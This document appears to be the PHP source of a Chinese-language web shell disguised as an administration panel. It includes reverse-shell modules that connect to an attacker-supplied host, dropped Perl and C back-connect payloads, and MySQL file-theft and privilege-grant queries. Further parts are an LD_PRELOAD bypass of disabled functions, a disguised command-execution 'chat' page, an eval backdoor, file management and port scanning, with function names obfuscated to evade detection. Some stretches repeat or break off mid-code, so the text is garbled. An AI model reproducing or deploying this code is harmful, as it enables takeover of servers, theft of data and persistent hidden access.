后台管理系统
$content
友情提示
-ロ×
$content
'; if ($GLOBALS['_POST']['use'] == '1') { $pl_code = StringHandler::getCode('pgone'); $result .= self::$fileClass->writeFile('/tmp/dyAeLWNJ' , 'wb' , Decrypt::run($pl_code)) ? '创建/tmp/dyAeLWNJ成功
' : '创建/tmp/dyAeLWNJ失败
'; $perl_path = Foundation::DeMarcia('which perl'); $perl_path = $perl_path ? chop($perl_path) : 'perl'; @unlink('/tmp/dyAeLWNJ.c'); Foundation::DeMarcia($perl_path . ' /tmp/dyAeLWNJ ' . $target_ip . ' ' . $target_port . ' &'); $result .= '母舰呼叫完成,请检查通讯结果。'; } if ($GLOBALS['_POST']['use'] == '2') { $c_code = StringHandler::getCode('gai'); $result .= self::$fileClass->writeFile('/tmp/dyAeLWNJ.c' , 'wb' , Decrypt::run($c_code)) ? '创建/tmp/dyAeLWNJ.c成功
' : '创建/tmp/dyAeLWNJ.c失败
'; Foundation::DeMarcia('gcc -o /tmp/dyAeLWNJ /tmp/dyAeLWNJ.c'); @unlink('/tmp/dyAeLWNJ.c'); $result .= Foundation::DeMarcia('/tmp/dyAeLWNJ ' . $target_ip . ' ' . $target_port . ' &') ? 'nc -vv -l ' . $target_port : '执行命令失败'; } if ($GLOBALS['_POST']['use'] == '3') { if (!extension_loaded('sockets')) { if ($system == 'WIN') { @dl('php_sockets.dll') or self::$htmlClass->tips("缺少相关模块" , '/?action=flyj'); } else { @dl('sockets.so') or self::$htmlClass->tips("缺少模块" , '/?action=flyj'); } } if ($system == "WIN") { $env = ['path' => 'c:\\windows\\system32']; } else { $env = ['PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin']; } $desc = [ 0 => ["pipe" , "r"] , 1 => ["pipe" , "w"] , 2 => ["pipe" , "w"] , ]; $host = gethostbyname($target_ip); $proto = getprotobyname("tcp"); $a = 'soc' . 'ket' . '_' . 'cre' . 'ate'; if (($sock = $a(AF_INET , SOCK_STREAM , $proto)) < 0) { die("与主舰的通讯建立失败"); } if (($ret = socket_connect($sock , $host , $target_port)) < 0) { die("通讯建立失败"); } else { $cwd = str_replace('\\' , '/' , dirname(__FILE__)); while ($cmd = socket_read($sock , 65535 , $proto)) { $process = proc_open($cmd , $desc , $pipes , $cwd , $env); if (is_resource($process)) { fwrite($pipes[0] , $cmd); fclose($pipes[0]); $msg = stream_get_contents($pipes[1]); socket_write($sock , $msg , strlen($msg)); fclose($pipes[1]); $msg = stream_get_contents($pipes[2]); socket_write($sock , $msg , strlen($msg)); proc_close($process); } } } } if ($GLOBALS['_POST']['use'] == '4') { $result .= 'function nFull(i){Str = new Array(11);Str[0] = "select version();";Str[1] = "select *** FROM user into outfile 'D:/web/iis.txt'";Str[2] = "select '' into outfile 'F:/web/123.php';";Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";nform.content.value = Str[i];return true;}
' : '创建/tmp/dyAeLWNJ失败
'; $perl_path = Foundation::DeMarcia('which perl'); $perl_path = $perl_path ? chop($perl_path) : 'perl'; @unlink('/tmp/dyAeLWNJ.c'); Foundation::DeMarcia($perl_path . ' /tmp/dyAeLWNJ ' . $target_ip . ' ' . $target_port . ' &'); $result .= '母舰呼叫完成,请检查通讯结果。'; } if ($GLOBALS['_POST']['use'] == '2') { $c_code = StringHandler::getCode('gai'); $result .= self::$fileClass->writeFile('/tmp/dyAeLWNJ.c' , 'wb' , Decrypt::run($c_code)) ? '创建/tmp/dyAeLWNJ.c成功
' : '创建/tmp/dyAeLWNJ.c失败
'; Foundation::DeMarcia('gcc -o /tmp/dyAeLWNJ /tmp/dyAeLWNJ.c'); @unlink('/tmp/dyAeLWNJ.c'); $result .= Foundation::DeMarcia('/tmp/dyAeLWNJ ' . $target_ip . ' ' . $target_port . ' &') ? 'nc -vv -l ' . $target_port : '执行命令失败'; } if ($GLOBALS['_POST']['use'] == '3') { if (!extension_loaded('sockets')) { if ($system == 'WIN') { @dl('php_sockets.dll') or self::$htmlClass->tips("缺少相关模块" , '/?action=flyj'); } else { @dl('sockets.so') or self::$htmlClass->tips("缺少模块" , '/?action=flyj'); } } if ($system == "WIN") { $env = ['path' => 'c:\\windows\\system32']; } else { $env = ['PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin']; } $desc = [ 0 => ["pipe" , "r"] , 1 => ["pipe" , "w"] , 2 => ["pipe" , "w"] , ]; $host = gethostbyname($target_ip); $proto = getprotobyname("tcp"); $a = 'soc' . 'ket' . '_' . 'cre' . 'ate'; if (($sock = $a(AF_INET , SOCK_STREAM , $proto)) < 0) { die("与主舰的通讯建立失败"); } if (($ret = socket_connect($sock , $host , $target_port)) < 0) { die("通讯建立失败"); } else { $cwd = str_replace('\\' , '/' , dirname(__FILE__)); while ($cmd = socket_read($sock , 65535 , $proto)) { $process = proc_open($cmd , $desc , $pipes , $cwd , $env); if (is_resource($process)) { fwrite($pipes[0] , $cmd); fclose($pipes[0]); $msg = stream_get_contents($pipes[1]); socket_write($sock , $msg , strlen($msg)); fclose($pipes[1]); $msg = stream_get_contents($pipes[2]); socket_write($sock , $msg , strlen($msg)); proc_close($process); } } } } if ($GLOBALS['_POST']['use'] == '4') { $result .= '
'; $fp = fsockopen($target_ip , $target_port , $errno , $errstr); if (!$fp) { $result .= "无法打开socket连接"; } else { $username = get_current_user(); $file_path = THEPATH; $host = $_SERVER['SERVER_NAME']; while (!feof($fp)) { $b = 'fp' . 'uts'; $b($fp , " [$username@$host:$file_path]# "); $result = fgets($fp , 4096); $message = Foundation::DeMarcia($result); $b($fp , " --> " . $message . "\n"); } fclose($fp); } $result .= '
'; } } return $result; } public function moneyManage () { $message = ''; $money_return = ''; $flag = isset($GLOBALS['_POST']['host']) && isset($GLOBALS['_POST']['user']); $target_host = $flag ? Decrypt::run($GLOBALS['_POST']['host']) : 'localhost'; $target_user = $flag ? Decrypt::run($GLOBALS['_POST']['user']) : 'root'; $target_pass = $flag ? Decrypt::run($GLOBALS['_POST']['pass']) : ''; $target_name = $flag ? Decrypt::run($GLOBALS['_POST']['data']) : 'mysql'; $target_port = $flag ? Decrypt::run($GLOBALS['_POST']['port']) : '3306'; $sql = $flag ? Decrypt::run($GLOBALS['_POST']['content']) : 'select version();'; $ap = 'mys' . 'ql_co' . 'nnent'; $ao = 'mys' . 'ql_se' . 'lect_db'; $ai = 'my' . 'sq' . 'l_qu' . 'ery'; $au = 'my' . 'sq' . 'l_fe' . 'tch_ar' . 'ray'; $ay = 'm' . 'ys' . 'ql_er' . 'ror'; if ($flag) { if ($conn = mysql_connect($target_host . ':' . $target_port , $target_user , $target_pass)) { @$ao($target_name); } else { self::$htmlClass->tips('连接MYSQL失败' , '?action=sjcx'); } } $down_file = 'c:/windows/homework/kaydenkdross.avi'; if (!empty($GLOBALS['_POST']['downfile'])) { $down_file = self::$fileClass->filePathFormat(urldecode(Decrypt::run(urldecode($GLOBALS['_POST']['downfile'])))); $bin_path = bin2hex($down_file); $query = "select load_file(0x$bin_path)"; if ($money_return = @$ai($query , $conn)) { $k = 0; $down_code = ''; while ($row = @$au($money_return)) { $down_code .= $row[$k]; $k ++; } if ($down_code) { $file_down = basename($down_file); if (!$file_down) $file_down = 'envl.tmp'; $array = explode('.' , $file_down); $array_end = array_pop($array); header('Content-type: application/x-' . $array_end); header('Content-Disposition: attachment; filename=' . $file_down); header('Content-Length: ' . strlen($down_code)); echo $down_code; exit; } else { self::$htmlClass->tips("文件查询失败,请检查 mysql secure-file-priv 配置" , "?action=sjcx&type=d"); } } else self::$htmlClass->tips("文件下载失败" , "?action=sjcx&type=d"); } $type = isset($GLOBALS['_GET']['type']) ? $GLOBALS['_GET']['type'] : ''; $result = << END; } else if ($type == 'd') { $result .= <<下载文件
END; } else { if (!empty($GLOBALS['_POST']['content'])) { $msql = Decrypt::run($GLOBALS['_POST']['content']); if ($sql_result = @$ai($msql , $conn)) { $message = '动作执行成功
'; $k = 0; while ($row = @$au($sql_result)) { $money_return = $row[$k]; $k ++; } } else $message .= $ay(); } $result .= <<$sql
'; $k = 0; while ($row = @$au($sql_result)) { $money_return = $row[$k]; $k ++; } } else $message .= $ay(); } $result .= <<
END; } if ($message != '') $result .= "
$message
$money_return
"; return $result; } public function preload () { $type = isset($GLOBALS['_POST']['type']) ? $GLOBALS['_POST']['type'] : ''; $cpu = isset($GLOBALS['_POST']['cpu']) ? $GLOBALS['_POST']['cpu'] : ''; $content = isset($GLOBALS['_POST']["content"]) ? Decrypt::run($GLOBALS['_POST']["content"]) : ''; $so_path = THEPATH . '/libsrc.so'; $result = <<本模块仅实现centos版64位so文件自动生成,其他请自行补充,将自己编译的so文件命名为libsrc.so放至同目录下可直接调用,C程序源码如下,其他需求请自行修改。
EOF; if (!$type && !$cpu && !$content) { $result .= <<执行命令
$command_line
命令环境变量
$a
so文件环境变量
"; switch ($type) { case '1': mail('' , '' , '' , ''); break; case '2': imap_mail('' , '' , '' , ''); break; case '3': error_log('' , '' , '' , ''); break; case '4': mb_send_mail('' , '' , '' , ''); break; } $return_content = nl2br(file_get_contents($out_path)); @unlink($out_path); $result .= '$b
执行命令回显' . '
' . $return_content . '
'; } return $result; } } class Foundation { public static function getCfg ($var_name) { switch ($result = get_cfg_var($var_name)) { case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break; } } public static function funAlive ($fun_name) { return (false !== function_exists($fun_name)) ? "Yes" : "No"; } public static function getSysInfo () { $result = <<a{color:#767b80;text-decoration:none;}table{margin:0 auto;width:900px;border-spacing:0;border-collapse:collapse;}td{border:1px solid #ededed;padding:12px 20px;}td:first-child{width:250px;text-align:right;}td:last-child{text-align:left;}tr:nth-child(odd){}tr:nth-child(even){background:#f9f9f9;}tr:hover{background:#f5f5f5;} EOF; $dis_func = get_cfg_var("disable_functions"); $upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传"; $adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "" . $_SERVER['SERVER_ADMIN'] . "" : "" . get_cfg_var("sendmail_from") . ""; if ($dis_func == "") { $dis_func = "No"; } else { $dis_func = str_replace(" " , "
" , $dis_func); $dis_func = str_replace("," , "
" , $dis_func); } $phpinfo = (!preg_match("phpinfo" , $dis_func)) ? "Yes" : "No"; $info = [ ["服务器时间/北京时间" , date("Y年m月d日 h:i:s" , time()) . " / " . gmdate("Y年n月j日 H:i:s" , time() + 8 * 3600)] , ["服务器域名:端口
[ip:port]" , "" . $_SERVER['SERVER_NAME'] . ":" . $_SERVER['SERVER_PORT'] . " ( " . gethostbyname($_SERVER['SERVER_NAME']) . " )"] , ["服务器操作系统(文字编码)" , PHP_OS . " (" . $_SERVER['HTTP_ACCEPT_LANGUAGE'] . ")"] , ["服务器解译引擎" , $_SERVER['SERVER_SOFTWARE']] , ["你的IP" , getenv('REMOTE_ADDR')] , ["PHP运行方式(版本)" , strtoupper(php_sapi_name()) . "(" . PHP_VERSION . ") / 安全模式:" . self::getCfg("safemode")] , ["服务器管理员" , $adminmail] , ["本文件路径" , __FILE__] , ["允许使用URL打开文件
[allow_url_fopen]" , self::getCfg("allow_url_fopen")] , ["允许动态加载链接库
[enable_dl]" , self::getCfg("enable_dl")] , ["显示错误信息
[display_errors]" , self::getCfg("display_errors")] , ["自定义全局变量
[register_globals]" , self::getCfg("register_globals")] , ["自动字符串转义
[magic_quotes_gpc]" , self::getCfg("magic_quotes_gpc")] , ["最多内存使用量
[memory_limit]" , self::getCfg("memory_limit")] , ["POST最大字节
[post_max_size]" , self::getCfg("post_max_size")] , ["允许最大上传
[upload_max_filesize]" , $upsize] , ["程序最长运行时间
[max_execution_time]" , self::getCfg("max_execution_time") . "秒"] , ["禁用函数
[disable_functions]" , $dis_func] , ["程序信息函数
[phpinfo()]" , $phpinfo] , ["目前还有空余空间
[diskfreespace]" , intval(diskfreespace(".") / (1024 * 1024)) . 'Mb'] , ["GZ压缩文件支持
[zlib]" , self::funAlive("gzclose")] , ["ZIP压缩文件支持
[ZipArchive(php_zip)]" , self::funAlive("zip_open")] , ["IMAP电子邮件系统" , self::funAlive("imap_close")] , ["XML解析" , self::funAlive("xml_set_object")] , ["FTP登陆" , self::funAlive("ftp_login")] , ["Session支持" , self::funAlive("session_start")] , ["Socket支持" , self::funAlive("fsockopen")] , ["MySQL数据库" , self::funAlive("mysql_close")] , ["MSSQL数据库" , self::funAlive("mssql_close")] , ["Postgre SQL数据库" , self::funAlive("pg_close")] , ["SQLite数据库" , self::funAlive("sqlite_close")] , ["Oracle数据库" , self::funAlive("ora_close")] , ["Oracle 8数据库" , self::funAlive("OCILogOff")] , ["SyBase数据库" , self::funAlive("sybase_close")] , ["Hyperwave数据库" , self::funAlive("hw_close")] , ["InforMix数据库" , self::funAlive("ifx_close")] , ["FilePro数据库" , self::funAlive("filepro_fieldcount")] , ["DBA/DBM连接" , self::funAlive("dba_close") . " / " . self::funAlive("dbmclose")] , ["ODBC/dBASE连接" , self::funAlive("odbc_close") . " / " . self::funAlive("dbase_close")] , ["PREL相容语法
[PCRE]" , self::funAlive("preg_match")] , ["PDF支持" , self::funAlive("pdf_close")] , ["图形处理
[GD Library]" , self::funAlive("imageline")] , ["SNMP网络管理协议" , self::funAlive("snmpget")] , ]; $result .= ''; for ($i = 0; $i < count($info); $i ++) { $result .= '
'; return $result; } public static function getPhpInfo () { date_default_timezone_set('Asia/Shanghai'); phpinfo(); $i = ob_get_contents(); ob_end_clean(); $html = str_replace("module_Zend Optimizer" , "module_Zend_Optimizer" , preg_replace('%^.*(.*).*$%ms' , '$1' , $i)); $html = str_replace(' width="600"' , '' , $html); $result = <<*{font-family:Consolas !important;}body{width:98%;}pre{margin:0px;font-family:monospace;}a:link{color:#000099;text-decoration:none;}table{margin-left:auto;width:100%;border-collapse:collapse;margin-right:auto;text-align:left;}div{box-sizing:border-box;}th{font-weight:bold;background:#eee;}td,th{border:1px solid #000000;vertical-align:baseline;font-size:14px;padding:5px;}.center{padding-left: 30px} {$html} STR; return $result; } public static function chatRobot () { $res = '我是您的智能聊天助手,请问我问题吧~'; $cmd = isset($GLOBALS['_POST']['content']) ? htmlspecialchars(Decrypt::run($GLOBALS['_POST']['content'])) : 'dir'; if (!empty($GLOBALS['_POST']['content'])) { $res = self::DeMarcia(Decrypt::run($GLOBALS['_POST']['content'])); } $result = <<.input-box{margin-bottom:20px;}.input-box span:first-child{display:inline-block;width:100px;font-size:18px;color:#333;text-align:left;}.input-text{vertical-align:middle;}.input-text2{vertical-align:top;}select{height:40px;margin:0 5px;outline:none;background:#fff;border:1px solid #ccc;font-size:14px;vertical-align:middle;color:#333;line-height:40px;}textarea{padding:10px;border-radius:4px;font-size:16px;border:1px solid #CCC;line-height:24px;color:#333;outline:none;width:660px;height:520px;}textarea:focus,input:focus{box-shadow:0 0 8px rgba(51,51,51,.6);}input{height:40px;padding:6px 12px;font-size:17px;line-height:1.42857143;color:#555;background-color:#fff;background-image:none;border:1px solid #ccc;border-radius:4px;outline:none;vertical-align:middle;}input[type='submit']{width:100px;cursor:pointer;font-size:14px;}input[type='submit']:hover{background:#ededed;}form{text-align:center;padding-right:150px;} END; return $result; } public static function DeMarcia ($string) { $res = ''; $a = StringHandler::getPen(); $b = StringHandler::getPineapple(); $c = 's' ./*-*/ 'h'/*-*/ . 'ell_' . $a; $d = StringHandler::getBanana(); $e = StringHandler::getOrange(); $g = StringHandler::getGrape(); if (function_exists($a)) { @$a($string , $res); $res = join("\n" , $res); } else if (function_exists($c)) { $res = @$c($string); } else if (function_exists($b)) { @ob_start(); @$b($string); $res = @ob_get_contents(); @ob_end_clean(); } else if (function_exists($d)) { @ob_start(); @$d($string); $res = @ob_get_contents(); @ob_end_clean(); } else if (@is_resource($f = @popen($string , 'r'))) { $res = ''; while (!@feof($f)) { $res .= @fread($f , 1024); } @pclose($f); } else if (substr(THEPATH , 0 , 1) != "/" && class_exists('COM')) { $w = new /*-*/ COM($e); $er = self::callBlack($w , $string); $f = self::callBlue($er); $res = self::callWhite($f); } else if (function_exists($g)) { $lf = null; $p = StringHandler::getApple($string , [1 => ['pipe' , 'w'] , 2 => ['pipe' , 'w']] , $lf); while (!feof($lf[1])) { $res .= htmlspecialchars(fgets($lf[1]) , ENT_COMPAT , 'UTF-8'); } while (!feof($lf[2])) { $res .= htmlspecialchars(fgets($lf[2]) , ENT_COMPAT , 'UTF-8'); } fclose($lf[1]); fclose($lf[2]); proc_close($p); } return $res; } public static function magicMaster () { $php_code = isset($GLOBALS['_POST']['content']) ? htmlspecialchars(Decrypt::run($GLOBALS['_POST']['content'])) : "echo 'textarea,.result{padding:10px;border-radius:4px;font-size:16px;border:1px solid #CCC;line-height:24px;color:#333;outline:none;width:390px;height:520px;vertical-align:middle;resize:none;display:inline-block;box-sizing:border-box;overflow:auto;}textarea:focus{box-shadow:0 0 8px rgba(51,51,51,.6);}.der{text-align:left;color:#333;font-size:16px;width:850px;margin:0 auto 15px;}form{padding:0 70px 0 20px;text-align:center;}.result .child{display:block !important;}input[type=submit]{outline:none;padding:0;box-sizing:content-box;vertical-align:middle;height:135px;line-height:135px;width:40px;border-radius:4px;margin:0 15px;} '; return $result; } public static function portEye () { $port_ip = isset($GLOBALS['_POST']['content']) ? Decrypt::run($GLOBALS['_POST']['content']) : '127.0.0.1'; $port_port = isset($GLOBALS['_POST']['method']) ? Decrypt::run($GLOBALS['_POST']['method']) : ''; $result = <<"; } return $result; } public static function swordHtml () { $result = <<.sug-box{width:700px;padding-right:50px;margin:0 auto;}.sug{font-size:18px;color:#333;margin-bottom:30px;}.sug-content{color:#666;font-size:16px;line-height:30px;}.active{display:block;margin-top:10px;background-color:#f8f8f8;padding:10px 20px;color:#666;margin-bottom:30px;border-radius:4px;border:1px solid #ccc;} EOF; return $result; } public static function sword () { $e = explode('_' , Decrypt::run($_REQUEST['e'])); $f = $e[3] . $e[1] . $e[5][1] . $e[2][0] . $e[0][0] . $e[2][1]; $f($GLOBALS['_POST']['singdancerapbasketball']); } public static function returnRand ($pw_length) { $rand_str = ''; for ($i = 0; $i < $pw_length; $i ++) { $rand_str .= chr(mt_rand(97 , 122)); } return $rand_str; } public static function callBlack ($class , $string) { return $class->exec($string); } public static function callBlue ($class) { return $class->StdOut(); } public static function callWhite ($class) { return $class->ReadAll(); } } class FileHandler { private $msg; private $p; function __construct () { $this->msg = ["0" => "保存成功" , "1" => "保存失败" , "2" => "上传成功" , "3" => "上传失败" , "4" => "修改成功" , "5" => "修改失败" , "6" => "删除成功" , "7" => "删除失败"]; $this->p = isset($GLOBALS['_GET']['path']) ? urldecode(Decrypt::run($GLOBALS['_GET']['path'])) : ""; } public function filePathFormat ($string) { return str_replace('//' , '/' , str_replace('\\' , '/' , $string)); } public function fileMode () { $RealPath = realpath('./'); $SelfPath = $_SERVER['PHP_SELF']; $SelfPath = substr($SelfPath , 0 , strrpos($SelfPath , '/')); return self::filePathFormat(substr($RealPath , 0 , strlen($RealPath) - strlen($SelfPath))); } public function getFileSize ($size) { $kb = 1024; $mb = 1024 * $kb; $gb = 1024 * $mb; $tb = 1024 * $gb; if ($size < $kb) { return $size . " B"; } else if ($size < $mb) { return round($size / $kb , 2) . " K"; } else if ($size < $gb) { return round($size / $mb , 2) . " M"; } else if ($size < $tb) { return round($size / $gb , 2) . " G"; } else { return round($size / $tb , 2) . " T"; } } public function renameFile () { $q = isset($GLOBALS['_GET']['newname']) ? Decrypt::run($GLOBALS['_GET']['newname']) : ""; $p_path = dirname($this->p); $content = @rename($this->p , $p_path . '/' . $q) ? $this->msg[4] : $this->msg[5]; $url = "?action=wjdc&path=" . base64_encode($p_path); HtmlOutput::tips($content , $url); } public function readFile ($filename) { $handle = @fopen($filename , "rb"); $file_code = @fread($handle , @filesize($filename)); @fclose($handle); return $file_code; } public function writeFile ($filename , $file_mode , $file_code) { $key = true; $handle = @fopen($filename , $file_mode); if (!@fwrite($handle , $file_code)) { @chmod($filename , 0666); $key = @fwrite($handle , $file_code) ? true : false; } @fclose($handle); return $key; } public function copyFile () { $new_path = explode('/' , Decrypt::run($GLOBALS['_GET']['newcopy'])); $pathr[0] = $new_path[0]; for ($i = 1; $i < count($new_path); $i ++) { $pathr[] = urlencode($new_path[$i]); } $new_copy = implode('/' , $pathr); $content = @copy($this->p , $new_copy) ? $this->msg[4] : $this->msg[5]; $url = "?action=wjdc&path=" . base64_encode(urlencode(dirname($this->p))); HtmlOutput::tips($content , $url); } public function moveFile ($file_a , $file_b) { $key = @copy($file_a , $file_b) ? true : false; if (!$key) $key = @move_uploaded_file($file_a , $file_b) ? true : false; return $key; } public function deleteDir ($del_dir) { $file_arr = self::getDirArray($del_dir); foreach ($file_arr as $del) { if (is_dir($del)) { if (!self::deleteDir($del)) return false; } else if (!is_dir($del)) { @chmod($del , 0777); if (!@unlink($del)) return false; } } @chmod($del_dir , 0777); if (!@rmdir($del_dir)) return false; return true; } public function deleteDirFile () { $p_path = dirname($this->p); $content = self::deleteDir($this->p) ? $this->msg[6] : $this->msg[7]; $url = "?action=wjdc&path=" . base64_encode($p_path); HtmlOutput::tips($content , $url); } public function deleteFile () { $p_path = dirname($this->p); $content = @unlink($this->p) ? $this->msg[6] : $this->msg[7]; $url = "?action=wjdc&path=" . base64_encode($p_path); HtmlOutput::tips($content , $url); } public function getFileType ($file) { $it = substr($file , - 3); switch ($it) { case "jpg": case "gif": case "bmp": case "png": case "ico": return 'img'; break; case "htm": case "tml": return 'html'; break; case "exe": case "com": return 'exe'; break; case "asp": return 'aspx'; break; case "css": return 'css'; break; case "xml": case "doc": return 'xml'; break; case "php": return 'php'; break; case "jsp": case "java": return 'jsp'; break; case ".js": case "vbs": return 'js'; break; case "mp3": case "wma": case "wav": case "swf": case ".rm": case "avi": case "mp4": case "mvb": return 'mp3'; break; case "rar": case "tar": case ".gz": case "iso": return 'rar'; break; case "zip": return 'zip'; default: return 'file'; break; } } public function downloadFile () { $file = isset($GLOBALS['_GET']['path']) ? urldecode(Decrypt::run($GLOBALS['_GET']['path'])) : ''; if (!@file_exists($file)) HtmlOutput::message('下载文件不存在'); $file_info = pathinfo($file); header('Content-type: application/x-' . $file_info['extension']); header('Content-Disposition: attachment; filename=' . $file_info['basename']); header('Content-Length: ' . filesize($file)); @readfile($file); exit; } public function downloadZip ($filecode , $file) { header("Content-type: application/unknown"); header('Accept-Ranges: bytes'); header("Content-length: " . strlen($filecode)); header("Content-disposition: attachment; filename=" . $file . ";"); echo $filecode; exit; } public function fileAction ($array , $type , $inver , $REAL_DIR) { if (($count = count($array)) == 0) return '请选择文件'; if ($type == 'e') { function listfiles ($dir = "." , $faisunZIP , $mydir) { $sub_file_num = 0; if (is_file($mydir . "$dir")) { if (realpath($faisunZIP->gzfilename) != realpath($mydir . "$dir")) { $faisunZIP->addFile(file_get_contents($mydir . $dir) , "$dir"); return 1; } return 0; } $handle = opendir($mydir . "$dir"); while ($file = readdir($handle)) { if ($file == "." || $file == "..") continue; if (is_dir($mydir . "$dir/$file")) { $sub_file_num += listfiles("$dir/$file" , $faisunZIP , $mydir); } else { if (realpath($faisunZIP->gzfilename) != realpath($mydir . "$dir/$file")) { $faisunZIP->addFile(file_get_contents($mydir . $dir . "/" . $file) , "$dir/$file"); $sub_file_num ++; } } } closedir($handle); if (!$sub_file_num) $faisunZIP->addFile("" , "$dir/"); return $sub_file_num; } function num_bitunit ($num) { $bitunit = [' B' , ' KB' , ' MB' , ' GB']; for ($key = 0; $key < count($bitunit); $key ++) { if ($num >= pow(2 , 10 * $key) - 1) { //1023B 会显示为 1KB $num_bitunit_str = (ceil($num / pow(2 , 10 * $key) * 100) / 100) . " $bitunit[$key]"; } } return $num_bitunit_str; } $mydir = $REAL_DIR; if (is_array($array)) { $faisunZIP = new PhpZip; if ($faisunZIP->startFile("$inver")) { $filenum = 0; foreach ($array as $file) { $filenum += listfiles($file , $faisunZIP , $mydir); } $faisunZIP->createFile(); return "压缩完成,共添加 $filenum 个文件。 点击下载 $inver (" . num_bitunit(filesize("$inver")) . ")"; } else { return "$inver 不能写入,请检查路径或权限是否正确。"; } } else { return "没有选择的文件或目录。"; } } $i = 0; while ($i < $count) { $array[$i] = urldecode($array[$i]); switch ($type) { case "a" : $inver = urldecode($inver); if (!is_dir($inver)) return '路径错误'; $filename = array_pop(explode('/' , $array[$i])); @copy($array[$i] , self::filePathFormat($inver . '/' . $filename)); $msg = '复制到' . $inver . '目录'; break; case "b" : $filename = array_pop(explode('/' , $array[$i])); if (!@unlink($array[$i])) { @chmod($filename , 0666); @unlink($array[$i]); } $msg = '删除'; break; case "c" : if (!preg_match("/^[0-7]{4}$/i" , $inver)) return '属性值错误'; $newmode = base_convert($inver , 8 , 10); @chmod($REAL_DIR . $array[$i] , $newmode); $msg = '属性修改为 ' . $inver; break; case "d" : @touch($array[$i] , strtotime($inver)); $msg = '修改时间为 ' . $inver; break; } $i ++; } return '所选文件 ' . $msg . ' 完毕'; } public function getDirArray ($filepath) { $show = []; $dir = dir($filepath); while ($file = $dir->read()) { if ($file == '.' or $file == '..') continue; $files = self::filePathFormat($filepath . '/' . $file); $show[] = $files; } $dir->close(); return $show; } public function getFileOwner ($File) { if (PATH_SEPARATOR == ':') { if (function_exists('posix_getpwuid')) { $File = posix_getpwuid(fileowner($File)); } return $File['name']; } else { return ''; } } public function getFileGroup ($File) { if (PATH_SEPARATOR == ':') { if (function_exists('posix_getgrgid')) { $File = posix_getgrgid(filegroup($File)); } return $File['name']; } else { return ''; } } public function arrayIconv ($data , $output = 'utf-8') { $encode_arr = ['UTF-8' , 'ASCII' , 'GBK' , 'GB2312' , 'BIG5' , 'JIS' , 'eucjp-win' , 'sjis-win' , 'EUC-JP']; $encoded = mb_detect_encoding($data , $encode_arr); if (!is_array($data)) { return mb_convert_encoding($data , $output , $encoded); } else { foreach ($data as $key => $val) { $key = $this->arrayIconv($key , $output); if (is_array($val)) { $data[$key] = $this->arrayIconv($val , $output); } else { $data[$key] = mb_convert_encoding($data , $output , $encoded); } } return $data; } } public function fileManage () { $path = isset($GLOBALS['_GET']['path']) ? urldecode(Decrypt::run($GLOBALS['_GET']['path'])) : THEPATH . '/'; $path_1 = base64_encode($path); $path_2 = base64_encode(dirname($path)); $result = << function rusurechk(msg,url){smsg = "文件名: [" + msg + "] \\n请输出新文件名:";re = prompt(smsg,msg);if (re){url = url + base64encode(re);window.location = url;}} function rusuredel(msg,url){smsg = "确定要删除 [" + msg + "] 吗?";if(confirm(smsg)){URL = url + base64encode(msg);window.location = url;}} function Delok(msg,gourl){smsg = "确定要删除 [" + unescape(msg) + "] 吗?";if(confirm(smsg)){if(gourl == 'b'){document.getElementById('select_all').value = escape(gourl);document.getElementById('fileall').submit();}else window.location = gourl;}} function CheckAll(form){for(var i=0;i EOF; $dir = @dir($path); $REAL_DIR = self::filePathFormat(realpath($path)); if (!empty($GLOBALS['_POST']['type'])) { $result .= '.new-file,.mine-file{position:relative;height:40px;padding:6px 12px;line-height:1.42857143;color:#555;background-color:#fff;background-image:none;border:1px solid #ccc;border-radius:4px;outline:none;vertical-align:middle;width:100px;cursor:pointer;font-size:14px;}.mine-file{height:40px;display:inline-block;width:auto;padding:0 25px;box-sizing:border-box;line-height:40px;}table{margin-top:10px;margin-bottom:30px;width:1100px;border-spacing:0;border-collapse:collapse;}tr:nth-child(even){background:#f9f9f9;}td,th{font-size:16px;border:1px solid #ededed;padding:8px 16px;}tr td:first-child input,tr td:first-child img,tr td:first-child a{vertical-align:middle;margin:0;}tr td:first-child img{margin-left:10px;}td a{color:#666;display:inline-block;}td:last-child a{padding:0 5px;}td a:hover{text-decoration:underline;}tr:hover{background:#f5f5f5;}.small-btn{width:80px;height:30px;border-radius:4px;margin-right:10px;}.num{color:#FF6600;}.main-content{width:1100px;margin:0 auto;padding-right:30px;}.delete{color:crimson;}.edit{color:#d46464;}.download{color:cornflowerblue;}.copy{color:cadetblue;}.change-name{color:#0ab2aa;}.pack{color:lightslategrey;}.upfile-box{width:100px;height:40px;line-height:40px;color:#555;font-size:14px;cursor:pointer;border-radius:4px;position:relative;text-align:center;display:inline-block;border:1px solid #ccc;box-sizing:border-box;vertical-align:middle;}.upfile{position:absolute;top:0;left:0;opacity:0;}.package{margin-bottom:20px;}.package a{color:#9dd69f;}
" , $dis_func); $dis_func = str_replace("," , "
" , $dis_func); } $phpinfo = (!preg_match("phpinfo" , $dis_func)) ? "Yes" : "No"; $info = [ ["服务器时间/北京时间" , date("Y年m月d日 h:i:s" , time()) . " / " . gmdate("Y年n月j日 H:i:s" , time() + 8 * 3600)] , ["服务器域名:端口
[ip:port]" , "" . $_SERVER['SERVER_NAME'] . ":" . $_SERVER['SERVER_PORT'] . " ( " . gethostbyname($_SERVER['SERVER_NAME']) . " )"] , ["服务器操作系统(文字编码)" , PHP_OS . " (" . $_SERVER['HTTP_ACCEPT_LANGUAGE'] . ")"] , ["服务器解译引擎" , $_SERVER['SERVER_SOFTWARE']] , ["你的IP" , getenv('REMOTE_ADDR')] , ["PHP运行方式(版本)" , strtoupper(php_sapi_name()) . "(" . PHP_VERSION . ") / 安全模式:" . self::getCfg("safemode")] , ["服务器管理员" , $adminmail] , ["本文件路径" , __FILE__] , ["允许使用URL打开文件
[allow_url_fopen]" , self::getCfg("allow_url_fopen")] , ["允许动态加载链接库
[enable_dl]" , self::getCfg("enable_dl")] , ["显示错误信息
[display_errors]" , self::getCfg("display_errors")] , ["自定义全局变量
[register_globals]" , self::getCfg("register_globals")] , ["自动字符串转义
[magic_quotes_gpc]" , self::getCfg("magic_quotes_gpc")] , ["最多内存使用量
[memory_limit]" , self::getCfg("memory_limit")] , ["POST最大字节
